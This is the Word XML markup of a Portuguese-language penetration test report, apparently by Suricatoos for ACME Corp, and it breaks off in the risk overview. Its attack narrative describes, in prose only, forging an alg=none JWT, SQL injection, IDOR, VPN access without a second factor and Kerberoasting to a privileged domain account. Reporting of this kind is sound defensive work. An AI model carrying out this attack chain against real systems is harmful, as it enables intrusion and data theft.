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B92898" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA0E6E7" wp14:editId="1DC6E76A">
            <wp:extent cx="685800" cy="6858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5712E1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>SURICATOOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C1C67" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF7678"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RELATÓRIO DE PENTEST · PTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A6D04" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751504DF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Preparado por Suricatoos para</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="25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82"/>
        <w:gridCol w:w="4191"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="7081ECDC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF767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268D7B9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>AC</w:t>
            </w:r>
          </w:p>
        </w:tc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4B289FA9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">  ACME Corp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4368A54A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF7678"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIDENCIAL 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E2E8F0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34"/>
        <w:gridCol w:w="7212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="4B9221F8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2099DAFB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Período</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="49729385" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>02/06/2026 – 06/06/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="7E6043B1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="402DF9F7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Versão</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3EDB4E86" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="14F0E7D7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E11D569" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Autor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1D34FD94" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Equipe Red Team — Suricatoos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="0CBB5EE8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78FAEB1C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Contato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D1A805D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>redteam@suricatoos.example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="3EE3A550" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B34AC12" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Risco geral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7EB9F472" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>82/100 (CRÍTICO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="611464BC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E49B71E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metodologia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D02D78F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PTES — Penetration Testing Execution Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66696DB1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A200A1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SEÇÃO 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FF1ED1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Sumário Executivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E1B34" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A Suricatoos conduziu uma avaliação ofensiva autônoma, orientada pela metodologia PTES, contra a superfície web e a infraestrutura Active Directory autorizadas da ACME Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F768D94" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>O engajamento identificou uma postura de risco ALTA: foi possível encadear vulnerabilidades de aplicação até o comprometimento de uma conta privilegiada do domínio de teste, demonstrando um caminho plausível para exposição de toda a base de clientes e controle administrativo do ambiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022251FE" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Os achados mais graves — bypass de autenticação por JWT inseguro e injeção de SQL — são exploráveis remotamente, sem autenticação prévia, e devem ser tratados de forma imediata. A seção de recomendações apresenta um roteiro de remediação priorizado por risco de negócio.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871"/>
        <w:gridCol w:w="3875"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="1281C67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9B02E0C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72A88986" wp14:editId="46B0C67A">
                  <wp:extent cx="2190750" cy="1628775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="125586945" name="Picture 12558694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0750" cy="1628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6E38C14" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BB0646" wp14:editId="4FEC57A3">
                  <wp:extent cx="1428750" cy="1428750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="841456439" name="Picture 84145643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0" cy="1428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7A8808E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">10 achados   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2 críticos   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="059669"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 quick wins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36588494" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE2F60E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Narrativa do Ataque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06848D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Do reconhecimento ao impacto: como achados isolados se encadeiam em um caminho real de comprometimento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5717ECAA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38EAE880" wp14:editId="26E639A3">
            <wp:extent cx="5715000" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1196304022" name="Picture 11963040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590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DF0E9F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Reconhecimento  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740D3EF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A partir de fontes públicas e enumeração autorizada, mapeamos a loja, a API de pedidos e o acesso remoto (VPN), além de um caminho para a rede interna. A superfície exposta já indicava controles de autenticação frágeis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F606D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ponto de entrada  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>[F-01]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F2FEF3" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A API aceitava tokens JWT sem assinatura (alg=none). Forjamos um token de administrador e obtivemos acesso privilegiado à API — sem precisar de credenciais válidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122BA9D0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Acesso aos dados  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>[F-02, F-03]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E5BDE" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>A busca da loja era vulnerável a SQL Injection, permitindo leitura do banco. Em paralelo, uma falha de autorização (IDOR) expunha pedidos e dados pessoais de outros clientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B71C2F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Pivô para a rede interna  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>[F-07]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0E3F4" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>O acesso remoto via VPN não exigia segundo fator. Com credenciais obtidas, entramos na rede interna, atingindo o domínio Active Directory de teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F60047" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Escalada de privilégios  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>[F-04]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48756834" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Uma conta de serviço com senha fraca permitiu Kerberoasting: extraímos e quebramos o hash offline, assumindo uma conta privilegiada do domínio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B6682" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Impacto demonstrado  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B087E57" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Encadeando os achados, demonstramos um caminho plausível para expor toda a base de clientes e assumir controle administrativo do ambiente — tudo com provas de conceito não destrutivas, dentro do escopo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3A5C5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B726C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Visão Geral de Risco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E417CD0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Distribuição de risco por probabilidade e impacto, e concentração por categoria de superfície avaliada.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708"/>
        <w:gridCol w:w="5038"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="38C50D55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15E20C4" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/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693DF276" wp14:editId="088B8751">
                  <wp:extent cx="2667000" cy="2667000"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1979547015" name="Picture 19795470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667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31BB394" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
